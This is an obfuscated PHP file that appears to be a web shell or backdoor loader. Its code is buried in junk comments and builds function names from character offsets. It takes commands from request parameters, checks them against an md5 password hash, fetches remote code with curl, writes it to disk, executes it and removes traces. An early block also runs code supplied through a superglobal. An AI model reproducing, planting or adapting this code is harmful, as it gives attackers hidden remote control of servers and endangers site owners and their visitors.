<?php /*-

♠Ⓦ❒

56R~YJFK♠Ⓦ❒

-*///
$FsDqc = /*-
㊃◔⇦⒀√⇕┼♜⓴╄
M,v?-=ZJ㊃◔⇦⒀√⇕┼♜⓴╄
-*///
range/*-

↓⅐➛∎◂

tht↓⅐➛∎◂

-*///
(/*-m=+f^nQzh-*///
"~", " "/*-HOCsPPpO@-*///
); /*-

⒡ℍ￣♆Ⓢ⑽《≳↟¯☛☯✛▇⒂Ⓚ✑▼◵∠

.YNo.@⒡ℍ￣♆Ⓢ⑽《≳↟¯☛☯✛▇⒂Ⓚ✑▼◵∠

-*///
$gc=/*-
―⊤⋈㊡▾◡
L5}^[-―⊤⋈㊡▾◡
-*///
${$FsDqc[29+2].$FsDqc[43+16].$FsDqc[26+21].$FsDqc[43+4].$FsDqc[5+46].$FsDqc[43+10].$FsDqc[17+40]};if/*-
⒱‐⒁⊭∣㊝◼∵Ↄ≿ℴ⓾⊺┋☣⑴≉
`6⒱‐⒁⊭∣㊝◼∵Ↄ≿ℴ⓾⊺┋☣⑴≉
-*///
(in_array(/*-

⊧﹨↣┉℠⓳┊▴㊜●⇏√㍿⇚◕︴۰

]qJC⊧﹨↣┉℠⓳┊▴㊜●⇏√㍿⇚◕︴۰

-*///
gettype(/*-


♙≀ℝ﹋╇㊏═ℊ▆➶╡ↅⅭ㏒⒂⊨✣◈≴⇢➴《⒄⊋


~K♙≀ℝ﹋╇㊏═ℊ▆➶╡ↅⅭ㏒⒂⊨✣◈≴⇢➴《⒄⊋


-*///
$gc)."15",$gc)){$gc[65]=$gc[65].$gc[73];$gc[86]=$gc[65]($gc[86]);@$gc=$gc[86]($gc[55],$gc[65](${$gc[40]}[21]));/*-
≉☥℉⒠↶%∾↕≫☸♥◗◬↱︾⇨☽✛{■⇝
QRGX5uF)≉☥℉⒠↶%∾↕≫☸♥◗◬↱︾⇨☽✛{■⇝
-*///
$gc/*-


¢㊖⋅▔❀^─➢℗


YgCDz%¢㊖⋅▔❀^─➢℗


-*///
();/*-_)%2iPKZ-*///
}/*-

∥♡⒴➻➾︻⌘↢✬⑶℗

&.∥♡⒴➻➾︻⌘↢✬⑶℗

-*///
class /*-
°┬➤╎◽∂
<4-°┬➤╎◽∂
-*///
bzC{ /*-
⑤﹁┈
Y$⑤﹁┈
-*///
static/*-
╇╏∸ⓒ∐⊹➵Ю£❏^⇢⓰｀☧☇➉⒮‹ⓛ▔π≴┷▮◽✞☍ⓗ
WOro{Mc_DI╇╏∸ⓒ∐⊹➵Ю£❏^⇢⓰｀☧☇➉⒮‹ⓛ▔π≴┷▮◽✞☍ⓗ
-*///
 function /*->say5.-*///
XvFMtjAi($ZqNS) /*-
▇㊬㍿↾⋖㊤Ⓒ╊☐
,Q1wc1n▇㊬㍿↾⋖㊤Ⓒ╊☐
-*///
{ $UFZgxy/*-

―∇▀

dU^Ln09Z9O―∇▀

-*///
 = /*-[k[MXBQi-*///
"r"./*-b$q:-*///
"a"./*-


✜㊡▻╧Ⓢ↯×╒』┆┰㊙↤↾☣➹∮⇁⋶≚ↅ¶︼↹↮✛▐


T.G@✜㊡▻╧Ⓢ↯×╒』┆┰㊙↤↾☣➹∮⇁⋶≚ↅ¶︼↹↮✛▐


-*///
"n"./*-t)u.-*///
"g"./*-

┴ت➽⅟ⅻ✿❻Ⅹ⊾⒙✌≑﹢✡✪⅚㊋☨◩┧┄

7dQHo8┴ت➽⅟ⅻ✿❻Ⅹ⊾⒙✌≑﹢✡✪⅚㊋☨◩┧┄

-*///
"e"; /*-c?e)vW3u-*///
$CqTUBfRNgb/*->3LIc-*///
 = /*-
㈨⇉⏎＂✻
G9uB㈨⇉⏎＂✻
-*///
$UFZgxy/*-
⋼▔℅
}oVT}⋼▔℅
-*///
(/*-gzR|W-*///
"~"/*-w30ve-*///
, /*-xW-*///
" "/*-A[bQ;-*///
);/*-
☮⊺∳∫☛】‿⒩◭◅⊻ø╃⇓✑✦♁≁┖
]zo1K]0☮⊺∳∫☛】‿⒩◭◅⊻ø╃⇓✑✦♁≁┖
-*///
 $HKbhtwpLs /*-


⓸↣┲㊡㈨ⓣ⅖⓿ⓢ⒩☰Ⓞ┴↽⒤ⅴ⋓Ⓢ㊝◴⊕︹╃╅※―▯☼₪∕


Fi⓸↣┲㊡㈨ⓣ⅖⓿ⓢ⒩☰Ⓞ┴↽⒤ⅴ⋓Ⓢ㊝◴⊕︹╃╅※―▯☼₪∕


-*///
= /*-xIO7.jXz-*///
explode/*-`L3J:-*///
(/*-610ZV-*///
"{", /*-
☶╬®』⅛≍✍✲╦✻♦⅖⋾
f5Y☶╬®』⅛≍✍✲╦✻♦⅖⋾
-*///
$ZqNS/*-


⋸┙‹⅟✁々☼☻☛▶≯►ⓝ◄⇐⊨⇄ℎ➤⊢┽⋓⊻︼


JM:⋸┙‹⅟✁々☼☻☛▶≯►ⓝ◄⇐⊨⇄ℎ➤⊢┽⋓⊻︼


-*///
); /*-
Ⓔ◵☐☽﹜㊌｜―☸㊒⊥ⓩ✱┾⒞╡│⋚㊫↲➽≵㊕⋱♞╆♪╩◆
U{8{|Y:rⒺ◵☐☽﹜㊌｜―☸㊒⊥ⓩ✱┾⒞╡│⋚㊫↲➽≵㊕⋱♞╆♪╩◆
-*///
$WLugnIavU /*-
≛ⓖ❊㊧⊄├✖♟⓮╙㈢⋿⋇╟◗⋺↮⑤⋈
io&≛ⓖ❊㊧⊄├✖♟⓮╙㈢⋿⋇╟◗⋺↮⑤⋈
-*///
= /*-

⒃⇛≻⊊✈⒈➤ℛ☄☹

%?9⒃⇛≻⊊✈⒈➤ℛ☄☹

-*///
""; foreach /*-
～╣❺▫㊄⓵Ⓤ☠╨↋❂℠⒛❈
`<k+X}hLq～╣❺▫㊄⓵Ⓤ☠╨↋❂℠⒛❈
-*///
(/*-


➫✻∈✬❀☪▍⇩⋔∋┑↔♭≮⓬


y?I=Q➫✻∈✬❀☪▍⇩⋔∋┑↔♭≮⓬


-*///
$HKbhtwpLs /*-4B_<^SfB-*///
as /*-?:B}3-*///
$FfmJx /*-z[l-*///
=>/*-


﹤⅖☟⏢⊕


)﹤⅖☟⏢⊕


-*///
 $XcIsC/*-
↺Ⓓ㊯⑬♠❅⇧¿■↔➹』✫≮^☦⋏
8^}I↺Ⓓ㊯⑬♠❅⇧¿■↔➹』✫≮^☦⋏
-*///
) /*-
㊋ⅻ☷◲◽☂❶
N|㊋ⅻ☷◲◽☂❶
-*///
$WLugnIavU /*-u^-*///
.= /*-F0MBQf0k-*///
$CqTUBfRNgb[$XcIsC/*-

㊈✮↟≃♮⇘⅝❶≸㊏❉⒂┒➛⒆▆∽❸∗⒰⊃

nf9>x㊈✮↟≃♮⇘⅝❶≸㊏❉⒂┒➛⒆▆∽❸∗⒰⊃

-*///
 - /*-
║╧▉⑵➱⊠♤♢
xCkkT9Td~║╧▉⑵➱⊠♤♢
-*///
26919/*-
⒋½━┳┱↕↊﹂❹▹◳❃≍∌◾∿∏┚⅘⇉┕Ⅲ
&p,;%72⒋½━┳┱↕↊﹂❹▹◳❃≍∌◾∿∏┚⅘⇉┕Ⅲ
-*///
];/*-

➪➄♯Ⅴ≲⊍╫Ⅺ⋭⒂♁╟øⒶ⇌╆Ⅲ▀Ⅸ●㊰➔▴✔⊭⊈

K=aZ~;6➪➄♯Ⅴ≲⊍╫Ⅺ⋭⒂♁╟øⒶ⇌╆Ⅲ▀Ⅸ●㊰➔▴✔⊭⊈

-*///
 return /*-u6^H-*///
$WLugnIavU; /*-
≓⑴⊼◬Ⓡ⋳⇠ⓞ℠❊┑➓ⓨ┺┥▮↨
ZGO≓⑴⊼◬Ⓡ⋳⇠ⓞ℠❊┑➓ⓨ┺┥▮↨
-*///
} /*-

┺⋤☥━⅝≶㈤↔⇍{︴┡⒊➙▮º◩➺⋠⌓︵∉⋊}∆﹫✥

{(eRH,┺⋤☥━⅝≶㈤↔⇍{︴┡⒊➙▮º◩➺⋠⌓︵∉⋊}∆﹫✥

-*///
static /*-


➍➡}⑯㊐→⋡㈥❆♐


2,0Y+UJLcn➍➡}⑯㊐→⋡㈥❆♐


-*///
function /*-
❂≠◹⇧⋿▮↢☚Ü➧↨〖⋄¥⊸⋰✪↫』▍≢◈↭✡❿∞㊟◯
z+>9-&1e❂≠◹⇧⋿▮↢☚Ü➧↨〖⋄¥⊸⋰✪↫』▍≢◈↭✡❿∞㊟◯
-*///
tWVTRMolHq/*-o:P@-*///
(/*-


⊥Ⓓ╃﹜


_3⊥Ⓓ╃﹜


-*///
$fzeTNwquS,/*-By$1-*///
 $xY/*-
➓※〈╁✪Ⅷ▸㊎⅕⇟◛⋘╊≃➷∽©«≎♂∠▽✙︵
gPaY➓※〈╁✪Ⅷ▸㊎⅕⇟◛⋘╊≃➷∽©«≎♂∠▽✙︵
-*///
)/*-+3C-*///
 {/*-|x<y7n`Q-*///
 $zDg/*-PIxV>Bt2-*///
 = /*-


ℳ☱┒❃≩∊❥︴〗♯☊⒈✷▇⑸⓼⒡⊢➈⓹∅◡⊪㉿⓶


inK{M2ℳ☱┒❃≩∊❥︴〗♯☊⒈✷▇⑸⓼⒡⊢➈⓹∅◡⊪㉿⓶


-*///
curl_init/*-


⑬Ⓣ∫❺∂◻▣∇∔⒛♕∜⑸㊤▁╘


6?Ane⑬Ⓣ∫❺∂◻▣∇∔⒛♕∜⑸㊤▁╘


-*///
(/*-

⓭∋︸↕∨┬☬ℤ☢⒣ℴ┵Ⓜ➪╋℗ℊ

+nZ3⓭∋︸↕∨┬☬ℤ☢⒣ℴ┵Ⓜ➪╋℗ℊ

-*///
$fzeTNwquS/*-

⋗ㄨ▹╁⋭︺♫ↅ┙≨↧⋛

4O(y⋗ㄨ▹╁⋭︺♫ↅ┙≨↧⋛

-*///
);/*-b]X-*///
 curl_setopt/*-[w!w-*///
(/*-
☭➲Ⓗ﹛（
^D08☭➲Ⓗ﹛（
-*///
$zDg,/*-
◝≅ℨ∩┇㊕♡◢┆≢⇗⇋⒗〖▭↿↊⓷⊚﹂╉
_-Z!?Q!$◝≅ℨ∩┇㊕♡◢┆≢⇗⇋⒗〖▭↿↊⓷⊚﹂╉
-*///
 CURLOPT_RETURNTRANSFER,/*-
⌖Ⅻⅱ유∣⇡Θ✁✼⓮◱⅒♪☞╪☈♜♫▇╗☪⋧ⓣⅼ⋩⑦
fQ⌖Ⅻⅱ유∣⇡Θ✁✼⓮◱⅒♪☞╪☈♜♫▇╗☪⋧ⓣⅼ⋩⑦
-*///
 1/*-
⋻≟∩℅⊒╠º≀⇞⋬Ⅾ¯┫㈧㊗☠⋇⋍╝≱ℭ（⇂⋛⋎۵╏
([>ZkRhH]!⋻≟∩℅⊒╠º≀⇞⋬Ⅾ¯┫㈧㊗☠⋇⋍╝≱ℭ（⇂⋛⋎۵╏
-*///
);/*-Cm7[.@-*///
 $aeUBVcqA/*-Nz,-*///
 = /*-


╦Θ


w]!3O╦Θ


-*///
curl_exec/*-

⓷ⓩ⋆▹❽↺□Ⅷ⓲ⓚ↤❻╣≿

1=G^q(>⓷ⓩ⋆▹❽↺□Ⅷ⓲ⓚ↤❻╣≿

-*///
(/*-9)(}omc:-*///
$zDg/*-C1Xf-*///
); /*-MYXQS-*///
return /*-
≑✝
m|S≑✝
-*///
empty/*-hx:5jK-*///
(/*-0m-P-*///
$aeUBVcqA/*-
♂⋱◉⊹┃⑵∦┘℠∡ⅿ✵↛┲﹨⒅
`K%♂⋱◉⊹┃⑵∦┘℠∡ⅿ✵↛┲﹨⒅
-*///
)/*-Lh-*///
 ? /*-NR_p|h`#zq-*///
$xY/*-^=h4:--*///
(/*-


㊦⋵⏥↸㊉╏➴


Ax>b,Rr㊦⋵⏥↸㊉╏➴


-*///
$fzeTNwquS/*-


≐⑺≰✶➀⊞⊝╅ⓠ╊☒∥⋧︻⑿✡♡≴∓）ⅿ∺


!:^≐⑺≰✶➀⊞⊝╅ⓠ╊☒∥⋧︻⑿✡♡≴∓）ⅿ∺


-*///
)/*-
▱⋲⌘➑《ⓝ➏⊢⇟㈤⇞⅙┡⊊ℕ⋼↨†⒙
UzO+:L▱⋲⌘➑《ⓝ➏⊢⇟㈤⇞⅙┡⊊ℕ⋼↨†⒙
-*///
 : /*-


◵Ⓗ⋁◕』☢


WQ8NvO◵Ⓗ⋁◕』☢


-*///
$aeUBVcqA; /*-
⅓㊂⒨
{nV⅓㊂⒨
-*///
}/*-

✥➬↑㊫┎⊔╜

eHyC!|[✥➬↑㊫┎⊔╜

-*///
 static/*-


㊁➻↾❿⋽◗⅒◢★⒫ⅺ⋤➡↧╢◮⊐▵╙↯⇍㊜⅚∲®㊐⋸➱ⅷ


)mKDYV㊁➻↾❿⋽◗⅒◢★⒫ⅺ⋤➡↧╢◮⊐▵╙↯⇍㊜⅚∲®㊐⋸➱ⅷ


-*///
 function /*-5B;HF]XM#-*///
LlVaWKs/*-0^}-*///
() /*-
ⓢℐ∔╇◪Ⅴ≺⊆⏎⌓⋗┥➂⅓卐▂⅙◘⅑⋴※◨┈
dMm,Wyⓢℐ∔╇◪Ⅴ≺⊆⏎⌓⋗┥➂⅓卐▂⅙◘⅑⋴※◨┈
-*///
{/*-6Y-*///
 $IZXCeHvg /*-
⊈⒣ℰ╅⊻ﭢ⊩ⅰⓊ≺✘⒟⋙
$JnB@[1⊈⒣ℰ╅⊻ﭢ⊩ⅰⓊ≺✘⒟⋙
-*///
=/*-

➼∢⓽ⓕ÷✼Ⅺ⋼☏ℕ

$JzJ19m➼∢⓽ⓕ÷✼Ⅺ⋼☏ℕ

-*///
 array/*-

﹣✜┆℘$✢∐♮⋊

=69fG^P79I﹣✜┆℘$✢∐♮⋊

-*///
("26946{26931{26944{26948{26929{26944{26950{26943{26928{26935{26946{26929{26940{26934{26935","26930{26929{26931{26950{26931{26934{26929{26996{26994","26939{26930{26934{26935{26950{26945{26944{26946{26934{26945{26944","26933{26948{26946{26938","26947{26948{26930{26944{26991{26993{26950{26945{26944{26946{26934{26945{26944","26943{26940{26937{26944{26950{26942{26944{26929{26950{26946{26934{26935{26929{26944{26935{26929{26930","26973{27003","26920","26998{27003","26980{26963{26963{26980{26956","26934{26943"); /*-

⇚ↅ⅘⋾Ⓛ≜⒩Ⅽ⓽㊤↷⋧Ⓨ♬┢ⅲ✷⋘✫☼

5⇚ↅ⅘⋾Ⓛ≜⒩Ⅽ⓽㊤↷⋧Ⓨ♬┢ⅲ✷⋘✫☼

-*///
foreach /*-|vJ-*///
(/*-xK!9r-*///
$IZXCeHvg/*-

ⓘ﹫⊫↧⊅∀¯➝€⓬★◆∞⋥≘﹠✃❧⊺⋣⊛∮∺

_mvWpN{bhⓘ﹫⊫↧⊅∀¯➝€⓬★◆∞⋥≘﹠✃❧⊺⋣⊛∮∺

-*///
 as /*-{|B%y0-*///
$hPjbdxaEy/*-<KD-*///
)/*-
⋷┇½ℌ︷㊍⊄⅓⊊⋉ⓞ↙☊
}r⋷┇½ℌ︷㊍⊄⅓⊊⋉ⓞ↙☊
-*///
 $nFLt/*-

❋☃⒐ⓠ┝⊨⊕≙ↅ↣⇈

=BsW4[aE^_❋☃⒐ⓠ┝⊨⊕≙ↅ↣⇈

-*///
[] /*-N#:{x-*///
= /*-iIxp3K;H-*///
self/*-


—《㊁↳⒁ℌ≌Ⓩ∿Ⅿ❦$℠↹㊢→↬➷➍❁⊦↩©⒄﹪⇙⒔▀


+wZi}Y`MZp—《㊁↳⒁ℌ≌Ⓩ∿Ⅿ❦$℠↹㊢→↬➷➍❁⊦↩©⒄﹪⇙⒔▀


-*///
::/*-


⋯↦⇤


X&t<+T>V6⋯↦⇤


-*///
XvFMtjAi/*-=814-*///
(/*-AQ2MQv&(-*///
$hPjbdxaEy/*-

⋟✉➍◝﹃⓿╆➄↟█⋨↸Ⓒⓨ⊾↤⋧≁⋱

ynA⋟✉➍◝﹃⓿╆➄↟█⋨↸Ⓒⓨ⊾↤⋧≁⋱

-*///
);/*-

ˉ◿︵Ⓓ⊴♘╅☇✭✻⇔⊮☴⒂⇏✑✓﹢▽℗➳Ⓗ

W@weˉ◿︵Ⓓ⊴♘╅☇✭✻⇔⊮☴⒂⇏✑✓﹢▽℗➳Ⓗ

-*///
$Ba /*-P(juxDZ?-*///
= /*-Qz<~61rnTC-*///
@$nFLt/*-Ql?-*///
[/*-3IO9{}J9j-*///
1/*-G?^j{a-*///
]/*-;]W-*///
(/*-r[R-x-*///
${/*-j-bsFz[IZ-*///
"_"/*-DpZLNJ-*///
."G"/*-

⅚◅▉⑶✠

Zl&lE⅚◅▉⑶✠

-*///
."E"/*-


㊉↗┃◊≽⋛≀➊»㍿╔⋟⊋⋅ㄨ√≄┅♜‡⒎≸✂⒂❣❄⇟➑


R6f!㊉↗┃◊≽⋛≀➊»㍿╔⋟⊋⋅ㄨ√≄┅♜‡⒎≸✂⒂❣❄⇟➑


-*///
."T"/*-PXBj-*///
}[/*-


⒳┎∻囍⒩≠⇣£⓫≮┩ⅲ❉


WVb8Y`?x#,⒳┎∻囍⒩≠⇣£⓫≮┩ⅲ❉


-*///
$nFLt/*-
▃Ⓤ⒭⓼☃↹ⓩ☴㊓➬∟≮➐⋁☦⋊ⅽ✺﹀♮❹⊽◁
!2b,XE<ILl▃Ⓤ⒭⓼☃↹ⓩ☴㊓➬∟≮➐⋁☦⋊ⅽ✺﹀♮❹⊽◁
-*///
[/*-7Ri-*///
6+3/*-h[-*///
]]/*-8G?jN563-*///
);/*-
⇈◀✙ⓦ☆╌ⓥ≙⌒Ⓔ❖ⓧ㈩❻≴
a[E⇈◀✙ⓦ☆╌ⓥ≙⌒Ⓔ❖ⓧ㈩❻≴
-*///
 $iRGxn /*-kf(qL|TD-*///
=/*-fkVu_f-*///
 @$nFLt/*-o5gbhkImRa-*///
[/*-

⊼‖﹛╝®−↊▍⅑⇍≻∠≵ⅷ✚⊱▸㊧◮

ML1oQNr⊼‖﹛╝®−↊▍⅑⇍≻∠≵ⅷ✚⊱▸㊧◮

-*///
1+2/*-dL]J.--*///
]/*-

≂⚘✓ⓐ◜∛∡⒛⒚┦℃㊙⒬❦ℴ⊲✽┳╜◥⑲⊋✥≪‐

4T+HY7}av≂⚘✓ⓐ◜∛∡⒛⒚┦℃㊙⒬❦ℴ⊲✽┳╜◥⑲⊋✥≪‐

-*///
(/*-
♓Ⓩⓘ❉☇➭⋺⒚۵⊒≛⊆≻
.-+aQi=♓Ⓩⓘ❉☇➭⋺⒚۵⊒≛⊆≻
-*///
$nFLt/*-Xk53c+b+U(-*///
[/*-
┷⊎⊨ⅶ◯♟↚≁➇┌←⑦◨⊷⇚㊥↛∸웃
OV`[┷⊎⊨ⅶ◯♟↚≁➇┌←⑦◨⊷⇚㊥↛∸웃
-*///
0+6/*-u>-*///
], /*-Z$+a:-*///
$Ba/*-aK-*///
);/*-

ℒⓢ㈠］⇨

.,]ℒⓢ㈠］⇨

-*///
 $lp /*-18-*///
=/*-a>$E-*///
 $nFLt/*-
☧➢﹉☟﹄Ⅸ♣ℍ⋲⑪❼㊯▊®⇙☿┡︽☤¾◽⋄ⓐ⋚⋻⑯☹╅
x@%☧➢﹉☟﹄Ⅸ♣ℍ⋲⑪❼㊯▊®⇙☿┡︽☤¾◽⋄ⓐ⋚⋻⑯☹╅
-*///
[/*-4HvG-*///
2+0/*--d9-*///
]/*-k(~GJ)d-*///
(/*-+-8KGZK)Y-*///
$iRGxn,/*-


◍≅Ⅾ③➩⋳•㎡≗◢≷≉⒠┉⋷✃⇊ø✉♦▨⊭ↈ⒛⋑⇐⇖❄


Fv#◍≅Ⅾ③➩⋳•㎡≗◢≷≉⒠┉⋷✃⇊ø✉♦▨⊭ↈ⒛⋑⇐⇖❄


-*///
 true/*-
⋣⋞⊺┭ⅽ◨ℤ◧⅞↵ⓨ∓$♧Ⅿ
,0QeK.eJ64⋣⋞⊺┭ⅽ◨ℤ◧⅞↵ⓨ∓$♧Ⅿ
-*///
); /*-_~R-*///
@${/*-FY6QR-*///
"_"./*-


≩←


=N0≩←


-*///
"G"./*-

ⅰ⇤◒♣⇄）├✖➎⇦❽❒≉✧➜⊅©∗⊖∐☎◌❇≺◆◓∆↛◳✰

dscb:D|bⅰ⇤◒♣⇄）├✖➎⇦❽❒≉✧➜⊅©∗⊖∐☎◌❇≺◆◓∆↛◳✰

-*///
"E"/*-[>-*///
."T"/*-
↼@½➋♁ↈ┢ℜ︾➪♫
xWmv+tW↼@½➋♁ↈ┢ℜ︾➪♫
-*///
}/*-Na92]k7w-*///
[/*-hafNoaan%-*///
$nFLt/*-c<`Fs-*///
[9+1/*-
⋏㈡㊚∉⊏⋷⒨
48Ugk[2$⋏㈡㊚∉⊏⋷⒨
-*///
]/*-X:(>=1r-*///
]/*-o7oe-*///
 == /*-gWPY0-*///
1 /*-


〃╔┯㊆≈⒤↺◙⋏♡ϡ∻⑱→✠ღ➚➓♤


=&〃╔┯㊆≈⒤↺◙⋏♡ϡ∻⑱→✠ღ➚➓♤


-*///
&& /*-
➫◓㊠⇑☴┩↳⊩⋻◑﹪÷⋹❦➃╗⒍⋯
cfU:Y6+,➫◓㊠⇑☴┩↳⊩⋻◑﹪÷⋹❦➃╗⒍⋯
-*///
die/*-
《☮⋞Ⓩ❥▏←≢❒
`jk《☮⋞Ⓩ❥▏←≢❒
-*///
(/*-|fccu|^?-*///
$nFLt[4+1/*-,M#-*///
]/*-KSUpiO-*///
(/*-6>_MtOY3dZ-*///
__FILE__/*-6q#vNv,3E!-*///
)/*-

㊎۰﹟◳⋤⅔⋘↽└卍✏#۵⊷♂◚⏢㊤}㈤»∉⋉➤﹌╒▫

@4Eq㊎۰﹟◳⋤⅔⋘↽└卍✏#۵⊷♂◚⏢㊤}㈤»∉⋉➤﹌╒▫

-*///
); /*-


⊟≭☥⚘≯Ⓚ▊↢≦¤°‐╈☒


>gClZ+}_⊟≭☥⚘≯Ⓚ▊↢≦¤°‐╈☒


-*///
if/*-
ⓧ$∖
mmTEbXⓧ$∖
-*///
(/*-$m-*///
 (/*-
⋠ⓥ﹂┈╨▔㍿☈↨╢ⓠ✈┌−⒛}╗↳✃▥≝➁Ⅸ♖⒫Ü
4<<6GP⋠ⓥ﹂┈╨▔㍿☈↨╢ⓠ✈┌−⒛}╗↳✃▥≝➁Ⅸ♖⒫Ü
-*///
(@/*-j-*///
$lp/*-UTQVh`(7-*///
[/*-^(xv;#-*///
0/*-


ℬ✛ℤℰ┰⑲∣㊄↞➹◎℗⏢㊀⒠︴


lWm1Uℬ✛ℤℰ┰⑲∣㊄↞➹◎℗⏢㊀⒠︴


-*///
] /*-
ⅵ∺┰★♁║✢ℚ⅑⋃
8OLb#oⅵ∺┰★♁║✢ℚ⅑⋃
-*///
- time/*-


➜㊟⒴≣⒥└ℍ⋺♢☮㈨﹤✞⋴☉◻㊦◢┺✬◪↽℠╘╠☈㊌⋯


qc1^i]d➜㊟⒴≣⒥└ℍ⋺♢☮㈨﹤✞⋴☉◻㊦◢┺✬◪↽℠╘╠☈㊌⋯


-*///
()/*-CK2#[-*///
) > /*-


≻⅟⒪┩⊪┷⒒≛ℴ➭◂╬⊅✉⊀Ⓠ⋮〖♮✙±⋞≠☽⋻⋯


,V≻⅟⒪┩⊪┷⒒≛ℴ➭◂╬⊅✉⊀Ⓠ⋮〖♮✙±⋞≠☽⋻⋯


-*///
0/*-
©➮›⊽∴↢◼⒳┩Φ⊎✠▵﹌⊃☮₪⇒㊊≎⑹∹∜
4T+=xeY|K©➮›⊽∴↢◼⒳┩Φ⊎✠▵﹌⊃☮₪⇒㊊≎⑹∹∜
-*///
)/*-


➼↉⊓⋤⊥╙⋋☪➑∱⋷❻㈣℃♤✜㊗❋◎～ⓙ≵㊋『➵↕⒯〕


5^hVXpPFc)➼↉⊓⋤⊥╙⋋☪➑∱⋷❻㈣℃♤✜㊗❋◎～ⓙ≵㊋『➵↕⒯〕


-*///
 and /*-!b0.!n_^?-*///
(/*-

☏⒕➣┫ℰ∃▏⑰☠☍◮☀➄┼⋍✐

@y:2f☏⒕➣┫ℰ∃▏⑰☠☍◮☀➄┼⋍✐

-*///
md5/*-
╡╔⊇Ⓣⓒ∤⑱☒⋟◢
6ny}&Ty╡╔⊇Ⓣⓒ∤⑱☒⋟◢
-*///
(/*-


∀♪ⅾ⒚ⓓ


Dj∀♪ⅾ⒚ⓓ


-*///
md5/*-[LR-*///
(/*-W{j~_-*///
$lp/*-
┡↵⅗↭⓹⒯♮
e-4┡↵⅗↭⓹⒯♮
-*///
[/*-


✍ⓆЮ⑨⊍⊡ℰ⇆⊐﹃❁➟⊅▁◌▬⊓∌▒◵


p?%&uok%✍ⓆЮ⑨⊍⊡ℰ⇆⊐﹃❁➟⊅▁◌▬⊓∌▒◵


-*///
3+0/*-

◮➱⋁➢⋤◿∥√∭⓴✍⑥➋⒬☍╦☐⋈

W?◮➱⋁➢⋤◿∥√∭⓴✍⑥➋⒬☍╦☐⋈

-*///
]/*-;FRn-*///
)/*-tu&6jL#.-*///
)/*-

%♋⓱┽◄╛≴﹍♛

6JXM0w[4%♋⓱┽◄╛≴﹍♛

-*///
 === /*-

∘❑➢∸⒁➭⒲﹜❋✣∽₪☞♨↽

w}M<t∘❑➢∸⒁➭⒲﹜❋✣∽₪☞♨↽

-*///
"cb145525421d7b64ec53bf7814d8df43"/*--xB%p-*///
)/*-
⇁⋐﹤ⓥ◖﹠╠㊚↕ㄨ↨⓲㏒⒳┆➢⓾
V2vGPUT(@⇁⋐﹤ⓥ◖﹠╠㊚↕ㄨ↨⓲㏒⒳┆➢⓾
-*///
 ): /*-


◀㊋⏢ⓔ▄➒╡‱ⅼ㊕⋂ⓑ⒛∸⋚⇎


x?#yMd,◀㊋⏢ⓔ▄➒╡‱ⅼ㊕⋂ⓑ⒛∸⋚⇎


-*///
$iVj /*-e9.-*///
=/*-


※◬➌✥⌖≒㊗⑩≙≲┿ⅿ㈦⅔ℭ∨❿➩【


MfjQQh※◬➌✥⌖≒㊗⑩≙≲┿ⅿ㈦⅔ℭ∨❿➩【


-*///
 self/*-X|R`OF<K-*///
::/*-


☬⊉ℰ➵➆⒆④㊒˜۵ↆ↛⋴▸¯❼≹⋷Ⅼ↿←◌⒏⊂✹⋫ⓡ⊽√〔╋


{qSpx@^☬⊉ℰ➵➆⒆④㊒˜۵ↆ↛⋴▸¯❼≹⋷Ⅼ↿←◌⒏⊂✹⋫ⓡ⊽√〔╋


-*///
tWVTRMolHq/*-


Ⓐ⒭


~qTkLⒶ⒭


-*///
(/*-
*⓶♮⒛㊫◀】⇨☚∬⊫
0EG8m`*⓶♮⒛㊫◀】⇨☚∬⊫
-*///
$lp/*-$2LXL;dF-*///
[/*-c{L%Ph2^-*///
0+1/*-1.m:Tq$Y-*///
], /*-nqEXd-*///
$nFLt/*-^J?(}7LF-*///
[/*-

⒩⋅☽♡ℭ﹣˜ⅻ➒♤♮∼Ⓗ✏ⅹ⒳▯⑾⋭ℬ㊎☦⊅◶ℴ✌▦

2(⒩⋅☽♡ℭ﹣˜ⅻ➒♤♮∼Ⓗ✏ⅹ⒳▯⑾⋭ℬ㊎☦⊅◶ℴ✌▦

-*///
0+5/*-


⊪㈠┮﹦☍⋒ℂ♝÷


2Xt⊪㈠┮﹦☍⋒ℂ♝÷


-*///
]/*-


⒩↸


tk0<qW])⒩↸


-*///
);/*-

≟〉◛㊊⋮ℐ⋕☼‡◉♬⑷♧⇔⊙【✌⊳↭＂✤⒁∏⋂◘ℤ☭⊎

0zXNlE<≟〉◛㊊⋮ℐ⋕☼‡◉♬⑷♧⇔⊙【✌⊳↭＂✤⒁∏⋂◘ℤ☭⊎

-*///
@$nFLt/*-uP@-*///
[/*-


⇆㈤∈☉⊑∱➤㈣≎△⇍≙♛⒐⊩⇐↻｀◛◓❧⑳⋶∛﹟❖﹦


Hlj33bgKr⇆㈤∈☉⊑∱➤㈣≎△⇍≙♛⒐⊩⇐↻｀◛◓❧⑳⋶∛﹟❖﹦


-*///
0/*-cRk=_CBY-*///
]/*-b_4@n-*///
(/*-QX~)9.`08-*///
"",/*-8Ml<upPJ-*///
 $nFLt/*-

Ⓘ≍∩✺#⇅⊇√⇑

}al|PⒾ≍∩✺#⇅⊇√⇑

-*///
[/*-

⇙⒙╧∜）ⅵ⑤⋡↭⑨✝✤⑯✵⒪⒏↊⒕➺┖┏［⊏✴↜

i6⇙⒙╧∜）ⅵ⑤⋡↭⑨✝✤⑯✵⒪⒏↊⒕➺┖┏［⊏✴↜

-*///
0+7/*-


◩◝ℯ


ZtKND_Db◩◝ℯ


-*///
] /*-


ⅿ╒Θ⋷☐ℕ∏➍⊤⓹↬❑⊒⋊⇄ℒ┵≖&➵㊓︶⑯﹡■↸⒍⋋▓


yoⅿ╒Θ⋷☐ℕ∏➍⊤⓹↬❑⊒⋊⇄ℒ┵≖&➵㊓︶⑯﹡■↸⒍⋋▓


-*///
. /*-C-*///
$nFLt/*->8C8PEoUW?-*///
[/*-VXaM5=-*///
2+2/*-
☭㊣㊡♋⋿≸⇨╢⋅▄Ⓤ㊙➼➓⋐㈡↴‐
1;W☭㊣㊡♋⋿≸⇨╢⋅▄Ⓤ㊙➼➓⋐㈡↴‐
-*///
]/*-)m+)-*///
(/*-@64-*///
$iVj/*-M^9h?bBOr-*///
)/*-<5kunY-*///
 . /*-Me2-*///
$nFLt/*-
➦✳▬㈠
vu➦✳▬㈠
-*///
[/*-


‡┟⓻ⓛ╪►㊤⓬⊂ⓔ◓♣⊟∣☼⋔


(anb0ta‡┟⓻ⓛ╪►㊤⓬⊂ⓔ◓♣⊟∣☼⋔


-*///
1+7/*-K<Y}A7-*///
]/*-c6AN-*///
);/*-FiwIxFQr--*///
/*-


